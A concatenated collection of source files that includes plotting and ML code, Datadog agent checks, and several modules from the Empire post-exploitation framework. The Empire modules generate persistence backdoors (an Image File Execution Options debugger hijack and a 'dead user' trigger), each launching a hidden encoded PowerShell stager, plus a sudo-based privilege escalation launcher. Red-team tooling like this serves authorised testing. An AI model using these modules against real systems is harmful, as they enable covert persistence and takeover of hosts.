'pdf': 'Portable Document Format',
'pgf': 'PGF code for LaTeX',
'png': 'Portable Network Graphics',
'ps': 'Postscript',
'raw': 'Raw RGBA bitmap',
'rgba': 'Raw RGBA bitmap',
'svg': 'Scalable Vector Graphics',
'svgz': 'Scalable Vector Graphics',
'tif': 'Tagged Image File Format',
'tiff': 'Tagged Image File Format'
"""
if fileDesc is not None:
fileDesc = '_' + str(fileDesc)
else:
fileDesc = '_' + self.type
if fileType not in self.fig.canvas.get_supported_filetypes():
raise Exception('fileType not recognized in saveFig')
else:
fileExt = '.' + fileType
if not fileName or not isinstance(fileName, basestring):
fileName = self.sim.cfg.filename + fileDesc + fileExt
else:
if fileName.endswith(fileExt):
fileName = fileName.split(fileExt)[0] + fileDesc + fileExt
else:
fileName = fileName + fileDesc + fileExt
if fileDir is not None:
fileName = os.path.join(fileDir, fileName)
if not overwrite:
while os.path.isfile(fileName):
try:
fileNumStr = fileName.split(fileExt)[0].split('_')[-1]
fileNumStrNew = str(int(fileNumStr) + 1).zfill(2)
fileName = fileName.split('_' + fileNumStr)[0]
except:
fileNumStr = fileNumStrNew = '01'
fileName = fileName.split(fileExt)[0]
fileName = fileName.split(fileNumStr)[0] + '_' + fileNumStrNew + fileExt
self.fig.savefig(fileName)
self.fileName = fileName
return fileName
def showFig(self, **kwargs):
plt.close(self.fig)
dummy = plt.figure(figsize=self.rcParams['figure.figsize'])
new_manager = dummy.canvas.manager
new_manager.canvas.figure = self.fig
self.fig.set_canvas(new_manager.canvas)
self.fig.show()
def addLegend(self, handles=None, labels=None, **kwargs):
legendParams = ['loc', 'bbox_to_anchor', 'fontsize', 'numpoints', 'scatterpoints', 'scatteryoffsets', 'markerscale', 'markerfirst', 'frameon', 'fancybox', 'shadow', 'framealpha', 'facecolor', 'edgecolor', 'mode', 'bbox_transform', 'title', 'title_fontsize', 'borderpad', 'labelspacing', 'handlelength', 'handletextpad', 'borderaxespad', 'columnspacing', 'handler_map']
legendKwargs = {}
for kwarg in kwargs:
if kwarg in legendParams:
legendKwargs[kwarg] = kwargs[kwarg]
cur_handles, cur_labels = self.axis.get_legend_handles_labels()
if not handles:
handles = cur_handles
if not labels:
labels = cur_labels
self.axis.legend(handles, labels, **legendKwargs)
def finishFig(self, **kwargs):
self.formatAxis(**kwargs)
if 'saveData' in kwargs:
if kwargs['saveData']:
self.saveData(**kwargs)
if 'saveFig' in kwargs:
if kwargs['saveFig']:
self.saveFig(**kwargs)
if 'showFig' in kwargs:
if kwargs['showFig']:
self.showFig(**kwargs)
else:
plt.close(self.fig)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.orig_rcParams)
class ScatterPlotter(GeneralPlotter):
"""A class used for scatter plotting"""
def __init__(self, data, axis=None, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.type = 'scatter'
self.x = data.get('x')
self.y = data.get('y')
self.s = data.get('s')
self.c = data.get('c')
self.marker = data.get('marker')
self.linewidth = data.get('linewidth')
self.cmap = data.get('cmap')
self.norm = data.get('norm')
self.alpha = data.get('alpha')
self.linewidths = data.get('linewidths')
def plot(self, **kwargs):
scatterPlot = self.axis.scatter(x=self.x, y=self.y, s=self.s, c=self.c, marker=self.marker, linewidth=self.linewidth, cmap=self.cmap, norm=self.norm, alpha=self.alpha, linewidths=self.linewidths)
self.finishFig(**kwargs)
return self.fig
class LinePlotter(GeneralPlotter):
"""A class used for line plotting"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.type = 'line'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
def plot(self, **kwargs):
self.formatAxis(**kwargs)
linePlot = self.axis.plot(self.x, self.y, color=self.color, marker=self.marker, markersize=self.markersize, linewidth=self.linewidth, alpha=self.alpha)
self.finishFig(**kwargs)
return self.fig
class HistPlotter(GeneralPlotter):
"""A class used for histogram plotting"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.type = 'histogram'
self.x = data.get('x')
self.bins = data.get('bins', None)
self.range = data.get('range', None)
self.density = data.get('density', False)
self.weights = data.get('weights', None)
self.cumulative = data.get('cumulative', False)
self.bottom = data.get('bottom', None)
self.histtype = data.get('histtype', 'bar')
self.align = data.get('align', 'mid')
self.orientation = data.get('orientation', 'vertical')
self.rwidth = data.get('rwidth', None)
self.log = data.get('log', False)
self.color = data.get('color', None)
self.alpha = data.get('alpha', None)
self.label = data.get('label', None)
self.stacked = data.get('stacked', False)
self.data = data.get('data', None)
def plot(self, **kwargs):
#self.formatAxis(**kwargs)
histPlot = self.axis.hist(self.x, bins=self.bins, range=self.range, density=self.density, weights=self.weights, cumulative=self.cumulative, bottom=self.bottom, histtype=self.histtype, align=self.align, orientation=self.orientation, rwidth=self.rwidth, log=self.log, color=self.color, alpha=self.alpha, label=self.label, stacked=self.stacked, data=self.data)
self.finishFig(**kwargs)
return self.fig
"""
Types of plot:
line
scatter
matrix
bar
pie
Plots:
plot2Dnet scatter
plotConn matrix, bar, pie
plotCSD
plotEPSPAmp
plotfI
plotLFP
plotRaster scatter
plotRatePSD
plotRates
plotRateSpectrogram
plotRxDConcentration
plotShape
plotSpikeHist
plotSpikeStats
plotSyncs
plotTraces line
"""
``` |
{
"source": "joewilaj/sportsGNNs",
"score": 2
} |
#### File: nbaGNNs/src/extract_team_GAT.py
```python
from __future__ import absolute_import
from tensorflow.keras import activations, constraints, initializers, regularizers
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Layer, Dropout, LeakyReLU, Dense, Concatenate,Reshape
import tensorflow as tf
import numpy as np
import pdb
#Custom Layer to extract offense and defense nodes for home and away teams
class Game_Vec(Layer):
def __init__(self,attention_feat_size):
super(Game_Vec,self).__init__()
self.feat_dim = attention_feat_size
def call(self,inputs):
defense_index = tf.math.add(inputs[0],tf.constant([31,31],dtype = tf.int64))
off = tf.gather(inputs[1],inputs[0], axis=1)
defense = tf.gather(inputs[1],defense_index, axis=1)
vegas = tf.gather(inputs[2],inputs[0], axis=1)
game_vec = tf.concat([off,defense,vegas],axis = 2)
return game_vec
class Game_Vec_D(Layer):
def __init__(self,attention_feat_size):
super(Game_Vec_D,self).__init__()
self.feat_dim = attention_feat_size
def call(self,inputs):
defense_index = tf.math.add(inputs[0],tf.constant([31,31],dtype = tf.int64))
off = tf.gather(inputs[1],inputs[0], axis=1)
defense = tf.gather(inputs[1],defense_index, axis=1)
vegas = tf.gather(inputs[2],inputs[0], axis=1)
model = tf.gather(inputs[3],inputs[0], axis=1)
game_vec = tf.concat([off,defense,vegas,model],axis = 2)
return game_vec
class To_Sparse(Layer):
def __init__(self,):
super(To_Sparse,self).__init__()
def call(self,inputs):
sparse_t = tf.sparse.from_dense(inputs[0], name = 'adj_mat')
return sparse_t
``` |
{
"source": "joewildiml/Empire",
"score": 2
} |
#### File: src/menus/ChatMenu.py
```python
import socketio.exceptions
from empire.client.src.EmpireCliState import state
from empire.client.src.MenuState import menu_state
from empire.client.src.menus.Menu import Menu
from empire.client.src.utils import print_util
from empire.client.src.utils.autocomplete_util import position_util
from empire.client.src.utils.cli_util import register_cli_commands
@register_cli_commands
class ChatMenu(Menu):
def __init__(self):
super().__init__(display_name='chat', selected='')
self.my_username = ''
state.chat_cache = []
def autocomplete(self):
return self._cmd_registry + super().autocomplete()
def get_completions(self, document, complete_event, cmd_line, word_before_cursor):
if position_util(cmd_line, 1, word_before_cursor):
yield from super().get_completions(document, complete_event, cmd_line, word_before_cursor)
def get_prompt(self) -> str:
return f"<b><ansigreen>{state.me['username']}</ansigreen></b>: "
def on_connect(self):
state.sio.on('chat/join', self.on_chat_join)
state.sio.on('chat/leave', self.on_chat_leave)
state.sio.on('chat/message', self.on_chat_message)
state.sio.emit('chat/history')
state.sio.emit('chat/join')
def on_disconnect(self):
if state.sio is not None:
try:
state.sio.emit('chat/leave')
except socketio.exceptions.BadNamespaceError:
print(print_util.color("[!] Unable to reach server"))
def on_enter(self):
print(print_util.color('[*] Exit Chat Menu with Ctrl+C'))
self.my_username = state.me['username']
for message in state.chat_cache:
print(message)
state.chat_cache = []
return True
@staticmethod
def is_chat_active():
return menu_state.current_menu_name == 'ChatMenu'
def on_chat_join(self, data):
message = print_util.color('[+] ' + data['message'])
if self.is_chat_active() == 'ChatMenu':
print(message)
else:
state.chat_cache.append(message)
def on_chat_leave(self, data):
message = print_util.color('[+] ' + data['message'])
if self.is_chat_active():
print(message)
else:
state.chat_cache.append(message)
def on_chat_message(self, data):
if data['username'] != state.me['username'] or data.get('history') is True:
if data['username'] == state.me['username']:
message = print_util.color(data['username'], 'green') + ': ' + data['message']
if self.is_chat_active():
print(message)
else:
state.chat_cache.append(print_util.color(message))
else:
message = print_util.color(data['username'], 'red') + ': ' + data['message']
if self.is_chat_active():
print(message)
else:
state.chat_cache.append(message)
def send_chat(self, text):
state.sio.emit('chat/message', {'message': text})
chat_menu = ChatMenu()
```
#### File: powershell/code_execution/invoke_assembly.py
```python
from __future__ import print_function
import pathlib
import base64
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# Helper function for arguments
def parse_assembly_args(args):
stringlist = []
stringbuilder = ""
inside_quotes = False
if not args:
return '""'
for ch in args:
if ch == " " and not inside_quotes:
stringlist.append(stringbuilder) # Add finished string to the list
stringbuilder = "" # Reset the string
elif ch == '"':
inside_quotes = not inside_quotes
else: # Ch is a normal character
stringbuilder += ch # Add next ch to string
# Finally...
stringlist.append(stringbuilder)
for arg in stringlist:
if arg == "":
stringlist.remove(arg)
argument_string = '","'.join(stringlist)
# Replace backslashes with a literal backslash so an operator can type a file path like C:\windows\system32 instead of C:\\windows\\system32
argument_string = argument_string.replace("\\", "\\\\")
return f'\"{argument_string}\"'
module_source = main_menu.installPath + "/data/module_source/code_execution/Invoke-Assembly.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
try:
with open(f"{main_menu.installPath}/downloads/{params['File']}", 'rb') as f:
assembly_data = f.read()
except:
return handle_error_message("[!] Could not read .NET assembly path at: " + str(params['Arguments']))
encode_assembly = helpers.encode_base64(assembly_data).decode('UTF-8')
# Do some parsing on the operator's arguments so it can be formatted for Powershell
if params['Arguments'] != '':
assembly_args = parse_assembly_args(params['Arguments'])
script_end = f'\nInvoke-Assembly -ASMdata "{encode_assembly}"'
# Add any arguments to the end execution of the script
if params['Arguments'] != '':
script_end += " -" + "Arguments" + " " + assembly_args
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
```
#### File: powershell/management/switch_listener.py
```python
from __future__ import print_function
import pathlib
from builtins import object
from builtins import str
from typing import Dict, Optional, Tuple
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "") -> Tuple[Optional[str], Optional[str]]:
# extract all of our options
listener_name = params['Listener']
if listener_name not in main_menu.listeners.activeListeners:
return handle_error_message("[!] Listener '%s' doesn't exist!" % (listener_name))
active_listener = main_menu.listeners.activeListeners[listener_name]
listener_options = active_listener['options']
script = main_menu.listeners.loadedListeners[active_listener['moduleName']].generate_comms(listenerOptions=listener_options, language='powershell')
# signal the existing listener that we're switching listeners, and the new comms code
script = "Send-Message -Packets $(Encode-Packet -Type 130 -Data '%s');\n%s" % (listener_name, script)
if main_menu.obfuscate:
script = data_util.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=main_menu.obfuscateCommand)
script = data_util.keyword_obfuscation(script)
return script
```
#### File: persistence/misc/debugger.py
```python
from __future__ import print_function
import pathlib
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# Set booleans to false by default
obfuscate = False
# management options
cleanup = params['Cleanup']
trigger_binary = params['TriggerBinary']
listener_name = params['Listener']
target_binary = params['TargetBinary']
# storage options
reg_path = params['RegPath']
# staging options
if (params['Obfuscate']).lower() == 'true':
obfuscate = True
obfuscate_command = params['ObfuscateCommand']
status_msg = ""
locationString = ""
if cleanup.lower() == 'true':
# the registry command to disable the debugger for Utilman.exe
script = "Remove-Item 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\%s';'%s debugger removed.'" %(target_binary, target_binary)
script = data_util.keyword_obfuscation(script)
if obfuscate:
script = helpers.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=obfuscation_command)
return script
if listener_name != '':
# if there's a listener specified, generate a stager and store it
if not main_menu.listeners.is_listener_valid(listener_name):
# not a valid listener, return nothing for the script
return handle_error_message("[!] Invalid listener: " + listener_name)
else:
# generate the PowerShell one-liner
launcher = main_menu.stagers.generate_launcher(listener_name, language='powershell', obfuscate=obfuscate,
obfuscationCommand=obfuscate_command,
bypasses=params['Bypasses'])
enc_script = launcher.split(" ")[-1]
# statusMsg += "using listener " + listenerName
path = "\\".join(reg_path.split("\\")[0:-1])
name = reg_path.split("\\")[-1]
status_msg += " stored in " + reg_path + "."
script = "$RegPath = '"+reg_path+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+enc_script+";"
# note where the script is stored
locationString = "$((gp "+path+" "+name+")."+name+")"
script += "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+target_binary+"';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+target_binary+"' -Name Debugger -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";start -Win Hidden -A \\\"-enc $x\\\" powershell\";exit;';'"+target_binary+" debugger set to trigger stager for listener "+listener_name+"'"
else:
# the registry command to set the debugger for the specified binary to be the binary path specified
script = "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+target_binary+"';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+target_binary+"' -Name Debugger -Value '"+trigger_binary+"';'"+target_binary+" debugger set to "+trigger_binary+"'"
if main_menu.obfuscate:
script = data_util.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=main_menu.obfuscateCommand)
script = data_util.keyword_obfuscation(script)
return script
```
#### File: persistence/powerbreach/deaduser.py
```python
from __future__ import print_function
import pathlib
import os
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
script = """
function Invoke-DeadUserBackdoor
{
Param(
[Parameter(Mandatory=$False,Position=1)]
[int]$Timeout=0,
[Parameter(Mandatory=$False,Position=2)]
[int] $Sleep=30,
[Parameter(Mandatory=$True,Position=3)]
[string] $Username,
[Parameter(Mandatory=$False,Position=4)]
[switch] $Domain
)
$running=$True
$match =""
$starttime = Get-Date
while($running)
{
if ($Timeout -ne 0 -and ($([DateTime]::Now) -gt $starttime.addseconds($Timeout)))
{
$running=$False
}
if($Domain)
{
$UserSearcher = [adsisearcher]"(&(samAccountType=805306368)(samAccountName=*$UserName*))"
$UserSearcher.PageSize = 1000
$count = @($UserSearcher.FindAll()).Count
if($count -eq 0)
{
Write-Verbose "Domain user $Username not found!"
$match=$True
}
}
else
{
$comp = $env:computername
[ADSI]$server="WinNT://$comp"
$usercheck = $server.children | where{$_.schemaclassname -eq "user" -and $_.name -eq $Username}
if(-not $usercheck)
{
$match=$True
}
}
if($match)
{
REPLACE_LAUNCHER
$running=$False
}
else
{
Start-Sleep -s $Sleep
}
}
}
Invoke-DeadUserBackdoor"""
listener_name = params['Listener']
if not main_menu.listeners.is_listener_valid(listener_name):
# not a valid listener, return nothing for the script
return handle_error_message("[!] Invalid listener: " + listener_name)
else:
# set the listener value for the launcher
stager = main_menu.stagers.stagers["multi/launcher"]
stager.options['Listener'] = listener_name
stager.options['Base64'] = "False"
# and generate the code
stager_code = stager.generate()
if stager_code == "":
return handle_error_message('[!] Error creating stager')
else:
script = script.replace("REPLACE_LAUNCHER", stager_code)
for option, values in params.items():
if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values)
out_file = params['OutFile']
if out_file != '':
# make the base directory if it doesn't exist
if not os.path.exists(os.path.dirname(out_file)) and os.path.dirname(out_file) != '':
os.makedirs(os.path.dirname(out_file))
f = open(out_file, 'w')
f.write(script)
f.close()
return handle_error_message("[+] PowerBreach deaduser backdoor written to " + out_file)
script = data_util.keyword_obfuscation(script)
if obfuscate:
script = helpers.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=obfuscation_command)
# transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting
modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
launcher = helpers.powershell_launcher(script, modifiable_launcher)
stager_code = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stager_code.split(" ")
# set up the start-process command so no new windows appears
script = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-DeadUserBackdoor started'" % (parts[0], " ".join(parts[1:]))
if main_menu.obfuscate:
script = data_util.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=main_menu.obfuscateCommand)
script = data_util.keyword_obfuscation(script)
return script
```
#### File: privesc/multi/sudo_spawn.py
```python
from __future__ import print_function
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common.module_models import PydanticModule
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# extract all of our options
listener_name = params['Listener']
user_agent = params['UserAgent']
safe_checks = params['UserAgent']
# generate the launcher code
launcher = main_menu.stagers.generate_launcher(listener_name, language='python', userAgent=user_agent, safeChecks=safe_checks)
if launcher == "":
return handle_error_message("[!] Error in launcher command generation.")
else:
password = <PASSWORD>['Password']
launcher = launcher.replace('"', '\\"')
launcher = launcher.replace('echo', '')
parts = launcher.split("|")
launcher = "python3 -c %s" % (parts[0])
script = 'import subprocess; subprocess.Popen("echo \\"%s\\" | sudo -S %s", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)' % (password, launcher)
return script
``` |
{
"source": "joewilliams/dd-agent",
"score": 2
} |
#### File: dd-agent/checks.d/gearmand.py
```python
import gearman
# project
from checks import AgentCheck
class Gearman(AgentCheck):
SERVICE_CHECK_NAME = 'gearman.can_connect'
def get_library_versions(self):
return {"gearman": gearman.__version__}
def _get_client(self,host,port):
self.log.debug("Connecting to gearman at address %s:%s" % (host, port))
return gearman.GearmanAdminClient(["%s:%s" %
(host, port)])
def _get_metrics(self, client, tags):
data = client.get_status()
running = 0
queued = 0
workers = 0
for stat in data:
running += stat['running']
queued += stat['queued']
workers += stat['workers']
unique_tasks = len(data)
self.gauge("gearman.unique_tasks", unique_tasks, tags=tags)
self.gauge("gearman.running", running, tags=tags)
self.gauge("gearman.queued", queued, tags=tags)
self.gauge("gearman.workers", workers, tags=tags)
self.log.debug("running %d, queued %d, unique tasks %d, workers: %d"
% (running, queued, unique_tasks, workers))
def _get_conf(self, instance):
host = instance.get('server', None)
port = instance.get('port', None)
if host is None:
self.warning("Host not set, assuming 127.0.0.1")
host = "127.0.0.1"
if port is None:
self.warning("Port is not set, assuming 4730")
port = 4730
tags = instance.get('tags', [])
return host, port, tags
def check(self, instance):
self.log.debug("Gearman check start")
host, port, tags = self._get_conf(instance)
service_check_tags = ["server:{0}".format(host),
"port:{0}".format(port)]
client = self._get_client(host, port)
self.log.debug("Connected to gearman")
tags += service_check_tags
try:
self._get_metrics(client, tags)
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.OK,
message="Connection to %s:%s succeeded." % (host, port),
tags=service_check_tags)
except Exception as e:
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL,
message=str(e), tags=service_check_tags)
raise
```
#### File: dd-agent/checks.d/postfix.py
```python
import os
# project
from checks import AgentCheck
from utils.subprocess_output import get_subprocess_output
class PostfixCheck(AgentCheck):
"""This check provides metrics on the number of messages in a given postfix queue
WARNING: the user that dd-agent runs as must have sudo access for the 'find' command
sudo access is not required when running dd-agent as root (not recommended)
example /etc/sudoers entry:
dd-agent ALL=(ALL) NOPASSWD:/usr/bin/find
YAML config options:
"directory" - the value of 'postconf -h queue_directory'
"queues" - the postfix mail queues you would like to get message count totals for
"""
def check(self, instance):
config = self._get_config(instance)
directory = config['directory']
queues = config['queues']
tags = config['tags']
self._get_queue_count(directory, queues, tags)
def _get_config(self, instance):
directory = instance.get('directory', None)
queues = instance.get('queues', None)
tags = instance.get('tags', [])
if not queues or not directory:
raise Exception('missing required yaml config entry')
instance_config = {
'directory': directory,
'queues': queues,
'tags': tags,
}
return instance_config
def _get_queue_count(self, directory, queues, tags):
for queue in queues:
queue_path = os.path.join(directory, queue)
if not os.path.exists(queue_path):
raise Exception('%s does not exist' % queue_path)
count = 0
if os.geteuid() == 0:
# dd-agent is running as root (not recommended)
count = sum(len(files) for root, dirs, files in os.walk(queue_path))
else:
# can dd-agent user run sudo?
test_sudo = os.system('setsid sudo -l < /dev/null')
if test_sudo == 0:
output, _, _ = get_subprocess_output(['sudo', 'find', queue_path, '-type', 'f'], self.log)
count = len(output.splitlines())
else:
raise Exception('The dd-agent user does not have sudo access')
# emit an individually tagged metric
self.gauge('postfix.queue.size', count, tags=tags + ['queue:%s' % queue, 'instance:%s' % os.path.basename(directory)])
# these can be retrieved in a single graph statement
# for example:
# sum:postfix.queue.size{instance:postfix-2,queue:incoming,host:hostname.domain.tld}
```
#### File: dd-agent/checks.d/powerdns_recursor.py
```python
from collections import namedtuple
# Datadog
from checks import AgentCheck
# 3p
import requests
class PowerDNSRecursorCheck(AgentCheck):
# See https://doc.powerdns.com/md/recursor/stats/ for metrics explanation
GAUGE_METRICS = [
'cache-entries',
'concurrent-queries',
]
RATE_METRICS = [
'all-outqueries',
'answers-slow',
'answers0-1',
'answers1-10',
'answers10-100',
'answers100-1000',
'cache-hits',
'cache-misses',
'noerror-answers',
'outgoing-timeouts',
'questions',
'servfail-answers',
'tcp-outqueries',
'tcp-questions',
]
SERVICE_CHECK_NAME = 'powerdns.recursor.can_connect'
def check(self, instance):
config, tags = self._get_config(instance)
stats = self._get_pdns_stats(config)
for stat in stats:
if stat['name'] in PowerDNSRecursorCheck.GAUGE_METRICS:
self.gauge('powerdns.recursor.{}'.format(stat['name']), float(stat['value']), tags=tags)
elif stat['name'] in PowerDNSRecursorCheck.RATE_METRICS:
self.rate('powerdns.recursor.{}'.format(stat['name']), float(stat['value']), tags=tags)
def _get_config(self, instance):
required = ['host', 'port', 'api_key']
for param in required:
if not instance.get(param):
raise Exception("powerdns_recursor instance missing %s. Skipping." % (param))
host = instance.get('host')
port = int(instance.get('port'))
api_key = instance.get('api_key')
tags = instance.get('tags', [])
Config = namedtuple('Config', [
'host',
'port',
'api_key']
)
return Config(host, port, api_key), tags
def _get_pdns_stats(self, config):
url = "http://{}:{}/servers/localhost/statistics".format(config.host, config.port)
service_check_tags = ['recursor_host:{}'.format(config.host), 'recursor_port:{}'.format(config.port)]
headers = {"X-API-Key": config.api_key}
try:
request = requests.get(url, headers=headers)
request.raise_for_status()
except Exception:
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL,
tags=service_check_tags)
raise
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.OK,
tags=service_check_tags)
return request.json()
```
#### File: dd-agent/checks.d/statsd.py
```python
import re
import socket
from StringIO import StringIO
# project
from checks import AgentCheck
SERVICE_CHECK_NAME = "statsd.can_connect"
SERVICE_CHECK_NAME_HEALTH = "statsd.is_up"
ENDER = re.compile("^(END|health: up|health: down)\n$", re.MULTILINE)
BAD_ENDER = re.compile("^ERROR\n$", re.MULTILINE)
class StatsCheck(AgentCheck):
def check(self, instance):
host = instance.get("host", "localhost")
port = instance.get("port", 8126)
tags = instance.get("tags", [])
tags = ["host:{0}".format(host), "port:{0}".format(port)] + tags
# Is it up?
health = self._send_command(host, port, "health", tags).getvalue().strip()
if health == "health: up":
self.service_check(
SERVICE_CHECK_NAME_HEALTH, AgentCheck.OK, tags
)
else:
self.service_check(
SERVICE_CHECK_NAME_HEALTH, AgentCheck.CRITICAL, tags
)
# Get general stats
stats = self._send_command(host, port, "stats", tags)
stats.seek(0)
for l in stats.readlines():
parts = l.strip().split(":")
if len(parts) == 2:
# Uptime isn't a gauge. Since we have only one exception, this
# seems fine. If we make more a lookup table might be best.
if parts[0] == "bad_lines_seen":
self.monotonic_count("statsd.{0}".format(parts[0]), float(parts[1]), tags=tags)
else:
self.gauge("statsd.{0}".format(parts[0]), float(parts[1]), tags=tags)
counters = len(self._send_command(host, port, "counters", tags).getvalue().splitlines()) - 1
self.gauge("statsd.counters.count", counters, tags=tags)
gauges = len(self._send_command(host, port, "gauges", tags).getvalue().splitlines()) - 1
self.gauge("statsd.gauges.count", gauges, tags=tags)
timers = len(self._send_command(host, port, "timers", tags).getvalue().splitlines()) - 1
self.gauge("statsd.timers.count", timers, tags=tags)
# Send the final service check status
self.service_check(SERVICE_CHECK_NAME, AgentCheck.OK, tags)
def _send_command(self, host, port, command, tags):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall("{0}\n".format(command))
buf = StringIO()
chunk = s.recv(1024)
buf.write(chunk)
while chunk:
if ENDER.search(chunk):
break
if BAD_ENDER.search(chunk):
raise Exception("Got an error issuing command: {0}".format(command))
chunk = s.recv(1024)
buf.write(chunk)
return buf
except Exception as e:
self.service_check(
SERVICE_CHECK_NAME, AgentCheck.CRITICAL, tags
)
raise Exception("Failed connection {0}".format(str(e)))
finally:
s.close()
```
#### File: checks/mock/test_haproxy.py
```python
from collections import defaultdict
import copy
# 3p
import mock
# project
from tests.checks.common import AgentCheckTest
MOCK_DATA = """# pxname,svname,qcur,qmax,scur,smax,slim,stot,bin,bout,dreq,dresp,ereq,econ,eresp,wretr,wredis,status,weight,act,bck,chkfail,chkdown,lastchg,downtime,qlimit,pid,iid,sid,throttle,lbtot,tracked,type,rate,rate_lim,rate_max,check_status,check_code,check_duration,hrsp_1xx,hrsp_2xx,hrsp_3xx,hrsp_4xx,hrsp_5xx,hrsp_other,hanafail,req_rate,req_rate_max,req_tot,cli_abrt,srv_abrt,
a,FRONTEND,,,1,2,12,1,11,11,0,0,0,,,,,OPEN,,,,,,,,,1,1,0,,,,0,1,0,2,,,,0,1,0,0,0,0,,1,1,1,,,
a,BACKEND,0,0,0,0,12,0,11,11,0,0,,0,0,0,0,UP,0,0,0,,0,1221810,0,,1,1,0,,0,,1,0,,0,,,,0,0,0,0,0,0,,,,,0,0,
b,FRONTEND,,,1,2,12,11,11,0,0,0,0,,,,,OPEN,,,,,,,,,1,2,0,,,,0,0,0,1,,,,,,,,,,,0,0,0,,,
b,i-1,0,0,0,1,,1,1,0,,0,,0,0,0,0,UP 1/2,1,1,0,0,1,1,30,,1,3,1,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,i-2,0,0,1,1,,1,1,0,,0,,0,0,0,0,UP 1/2,1,1,0,0,0,1,0,,1,3,2,,71,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,i-3,0,0,0,1,,1,1,0,,0,,0,0,0,0,UP,1,1,0,0,0,1,0,,1,3,3,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,i-4,0,0,0,1,,1,1,0,,0,,0,0,0,0,DOWN,1,1,0,0,0,1,0,,1,3,3,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,i-5,0,0,0,1,,1,1,0,,0,,0,0,0,0,MAINT,1,1,0,0,0,1,0,,1,3,3,,70,,2,0,,1,1,,0,,,,,,,0,,,,0,0,
b,BACKEND,0,0,1,2,0,421,1,0,0,0,,0,0,0,0,UP,6,6,0,,0,1,0,,1,3,0,,421,,1,0,,1,,,,,,,,,,,,,,0,0,
